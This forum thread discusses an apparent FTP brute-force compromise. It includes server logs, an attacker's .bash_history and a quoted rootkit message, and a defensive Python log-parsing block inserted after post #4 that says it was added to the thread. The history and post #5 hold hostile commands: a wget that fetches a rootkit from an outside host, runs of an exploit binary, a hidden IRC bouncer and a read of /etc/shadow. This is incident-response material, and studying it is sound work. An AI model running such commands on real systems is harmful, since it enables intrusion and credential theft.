
Thread: Suspicious log

  1. #1 Senior Member (Join Date: Dec 2002, Posts: 144)

    Suspicious log

    Nov 17 08:54:11 hosting pure-ftpd[13724]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:11 hosting pure-ftpd[13730]: (?@210.195.30.50) [INFO] New connection from 210.195.30.50
    Nov 17 08:54:12 hosting pure-ftpd[13730]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:12 hosting pure-ftpd[13737]: (?@210.195.30.50) [INFO] New connection from 210.195.30.50
    Nov 17 08:54:13 hosting pure-ftpd[13737]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:14 hosting pure-ftpd[13724]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 08:54:15 hosting pure-ftpd[13730]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 08:54:16 hosting pure-ftpd[13737]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 08:54:50 hosting pure-ftpd[13910]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
    Nov 17 08:54:52 hosting pure-ftpd[13910]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:55 hosting pure-ftpd[13929]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
    Nov 17 08:54:55 hosting pure-ftpd[13910]: (?@210.195.30.36) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 08:54:56 hosting pure-ftpd[13929]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:56 hosting pure-ftpd[13936]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
    Nov 17 08:54:57 hosting pure-ftpd[13936]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
    N
    ----
    Nov 17 09:39:50 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] New connection from 210.195.36.227
    Nov 17 09:39:51 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] rootbeer is now logged in
    Nov 17 09:39:54 hosting pure-ftpd[25356]: (rootbeer@210.195.36.227) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 09:44:53 hosting named[2053]: client 218.111.217.111#2671: update 'lanfar.com.my/IN' denied
    Nov 17 09:45:07 hosting pure-ftpd[26695]: (?@127.0.0.1) [INFO] New connection from 127.0.0.1
    Nov 17 09:45:07 hosting pure-ftpd[26695]: (?@127.0.0.1) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 09:50:12 hosting named[2053]: client 218.111.217.111#2827: update 'lanfar.com.my/IN' denied
    Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] New connection from 210.186.130.187
    Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] rootbeer is now logged in
    Nov 17 09:52:05 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] /usr/home/rootbeer//in/str00351117095203.zipx uploaded (144892 bytes, 3.11KB/sec)
    Nov 17 09:52:07 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] File successfully renamed or moved: [str00351117095203.zipx]->[str00351117095203.zip]
    Nov 17 09:52:07 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [INFO] Logout - CPU time spent: 0.010 seconds.

    Based on the log above, can we say that someone is spoofing an IP address and trying to log on to the box using the rootbeer user id? There is a lot of this type of log, for the entire day. What should I do? What is he trying to do?
    BlAcKiE
    GearBlitz

  2. #2 The Doctor Und3ertak3r (Join Date: Apr 2002, Posts: 2,744)

    Do you have a registered user for the box called Rootbeer? If yes, well, it looks like a remote log-in... by pharting around with proxies.

    If you don't have a user called Rootbeer...YOU DO NOW....in other words rooted... now I will sit back, watch and learn..

    cheers
    "Consumer technology now exceeds the average person's ability to comprehend how to use it. Give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  3. #3 AO Ancient: Team Leader (Join Date: Oct 2002, Posts: 5,197)

    grab the zipfile......

    Sit back and watch, grab anything else they put there. Popping a packet sniffer like Ethereal on the box would be nice too..... Just watch for outbound connections. When they start, mess with them for a while then kill the hack....
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

  4. #4 Just Another Geek (Join Date: Jul 2002, Location: Rotterdam, Netherlands, Posts: 3,401)

    Und3ertak3r already noted it. You seem to have a user named rootbeer. If you didn't create it, you're screwed. If it is an account you've created, it probably has a simple password. Someone may have brute-forced that password (those are the "Authentication failed" log entries). By using different proxies (source addresses in your logs) your attacker hopes you won't notice it.

    Because it's a TCP connection you can probably rule out TCP/IP spoofing. Spoofing a fully blown TCP connection is next to impossible to do over the Internet. Heck, it's hard enough to do in a lab environment.

    I'd definitely check out that zipfile. It may contain some tools your attacker plans on using.
    This might give you an edge, so it'll be easier to guess what your attacker will do next.
    Oliver's Law:
    Experience is something you don't get until just after you need it.
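The brute-force pattern described in this reply (repeated authentication failures for one account from several source addresses, then a successful login and an upload) can be picked out of pure-ftpd logs mechanically. This is an added defender-side example, not code from the thread; the input is excerpted from the log in post #1, and the regex names and the failure threshold are my own choices.

```python
import re
from collections import defaultdict

# Sample input: pure-ftpd lines excerpted from the thread's log (not the full log).
SAMPLE_LOG = """\
Nov 17 08:54:11 hosting pure-ftpd[13724]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:12 hosting pure-ftpd[13730]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:52 hosting pure-ftpd[13910]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:56 hosting pure-ftpd[13929]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
Nov 17 09:39:51 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] rootbeer is now logged in
Nov 17 09:44:53 hosting named[2053]: client 218.111.217.111#2671: update 'lanfar.com.my/IN' denied
Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] rootbeer is now logged in
Nov 17 09:52:05 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] /usr/home/rootbeer//in/str00351117095203.zipx uploaded (144892 bytes, 3.11KB/sec)
"""

# One regex for the syslog/pure-ftpd envelope, then one per message type we care about.
LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ pure-ftpd\[\d+\]: "
                     r"\((?P<user>[^@]+)@(?P<ip>[\d.]+)\) \[(?P<level>\w+)\] (?P<msg>.*)$")
FAIL_RE = re.compile(r"Authentication failed for user \[(?P<user>[^\]]+)\]")
LOGIN_RE = re.compile(r"^(?P<user>\S+) is now logged in$")
UPLOAD_RE = re.compile(r"^(?P<path>\S+) uploaded \((?P<bytes>\d+) bytes")


def analyze(log_text, fail_threshold=3):
    """Return findings: accounts that logged in after repeated failures, plus their uploads."""
    acct = defaultdict(lambda: {"failures": 0, "fail_sources": set(), "logins": [], "uploads": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other daemons (named, ...) or lines we do not parse
        ts, ip, msg = m["ts"], m["ip"], m["msg"]
        if mf := FAIL_RE.search(msg):   # before login the account name is only in the message
            acct[mf["user"]]["failures"] += 1
            acct[mf["user"]]["fail_sources"].add(ip)
        elif ml := LOGIN_RE.match(msg):
            acct[ml["user"]]["logins"].append((ts, ip))
        elif mu := UPLOAD_RE.match(msg):  # after login the envelope carries the account name
            acct[m["user"]]["uploads"].append((ts, ip, mu["path"], int(mu["bytes"])))
    findings = []
    for user, a in acct.items():
        if a["failures"] >= fail_threshold and a["logins"]:
            login_ips = sorted({ip for _, ip in a["logins"]})
            findings.append(f"{user}: {a['failures']} failed logins from "
                            f"{len(a['fail_sources'])} source(s), then logged in from {login_ips}")
        for ts, ip, path, size in a["uploads"]:
            findings.append(f"{user}: uploaded {path} ({size} bytes) from {ip} at {ts}")
    return findings
```

Feeding a whole day's log to analyze() gives one line per account that was ground on and then used, plus every file it dropped; the upload line is what points you at the zipfile the other replies say to grab.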

  5. #5 Senior Member (Join Date: Dec 2002, Posts: 144)

    Has anyone tried this?
    wget sonkeriki.front.ru/sk.tar.gz
    BlAcKiE
    GearBlitz

  6. #6 Junior Member (Join Date: Nov 2001, Posts: 20)

    Just did.
    This excerpt of the contents should say it all:
    Hello, dear friend
    I have two news for you. Bad one and the bad one:
    First, it seems that someone installed rootkit
    on your system...
    Second, is the fact that I can't execute (errno=%d)
    original /sbin/init binary!
    And reason why I am telling you this is
    that I can't live without this file. It's just
    kinda of symbiosis, so, boot from clean floppy,
    mount root fs and repair /sbin/init from backup.

    (and install me again, if you like :P)

    Best regards,
    your rootkit .. SoNkErIkI Say`s Have a nice day!
    Taken from the sk file in the tar.
    "I love fools and mistakes, I'm always making them" (Charles Darwin)

  7. #7 Just Another Geek (Join Date: Jul 2002, Location: Rotterdam, Netherlands, Posts: 3,401)

    Penguin, did you find a reference to that sk.tar.gz file on your system?
    If you did, you're definitely 0wn3d

    Take the system off-line, backup your data and reinstall everything from original media. Yes, this means nuking your system, there's no way to tell what else "they" may have touched without doing some serious forensic analysis... And don't forget to update your system before putting it online again.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  8. #8 Senior Member (Join Date: Dec 2002, Posts: 144)

    How do I find the file?
    I can't find the file; it seems to have been deleted.

    This is the .bash_history file:

    w
    ping www.yahoo.com
    cd /tmp
    cd /var/tmp
    ls -al
    cd /tmp
    ftp sonkeriki.front.ru
    bye
    ls -al
    cd /tmp
    tar xvf pt.tar
    ./pt
    ./pt
    id
    id
    id
    id
    id
    id
    id
    id
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    w
    who
    rm -rf pt pt.tar
    ls -al
    id
    ps x
    w
    w
    pwd
    cd .X11-unix/
    ls -al
    ftp sonkeriki.front.ru
    tar xzvf p.tar.gz
    PATH=.:$PATH
    sh
    cd ..
    exit
    bash
    clear
    exit
    w
    cd /tmp
    cd .X11-unix/
    ls -al
    rm -rf p.tar.gz
    ls -al
    mv psybnc .X11-unix
    ls -al
    cd .X11-unix
    make
    a
    a
    pwd
    ls -al
    mv psybnc sh
    ls -al
    hostname
    sh
    clear
    exit
    w
    cat /etc/host
    cat /etc/hosts
    ifconfig
    /sbin/ifconfig -a
    uptime
    ping www.yahoo.com
    cd /tmp
    ping www.yahoo.com
    clear
    exit
    hostname
    vhost
    vhosts
    ifconfig
    /sbin/ifconfig -a
    cat /etc/hosts
    id
    ls -al
    cd /home
    ls -al
    cat /etc/shadow
    cd /tmp
    ls -al
    su
    wget sonkeriki.front.ru/sk.tar.gz
    ls -al
    tar xzvf sk.tar.gz
    rm -rf download.php?URL=sonkeriki.front.ru%2Fsk.tar.gz
    ls -al
    cd /tmp
    ls -al

    What do you all think?
    BlAcKiE
    GearBlitz

  9. #9 Senior Member (Join Date: Dec 2002, Posts: 144)

    Originally posted here by recca
    Just did.
    This excerpt of the contents should say it all:

    [...]

    Taken from the sk file in the tar.
    Hey, how did you do it? I cannot gunzip the file after downloading it.
    BlAcKiE
    GearBlitz

  10. #10 Junior Member (Join Date: Nov 2004, Posts: 13)

    I'm just curious how this person gained "root" level access via your FTP site. Was some form of buffer overflow exploited in addition to the FTP account brute-forcing? Also, I assume you HAD to have had an account named "rootbeer" to be cracked by password grinding.

    For knowledge's sake, I'd suggest you determine if your FTP server (based on its revision) is susceptible to buffer overflow exploits, as I'm not aware of any native FTP-based methods of gaining root.

    And finally, based on your .bash_history, it looks like somebody's staging some great files to play with on your site and is definitely looking at setting up some sort of server-based process (hence all the pinging to yahoo.com and reviewing of your network config with ifconfig).

    Good luck!
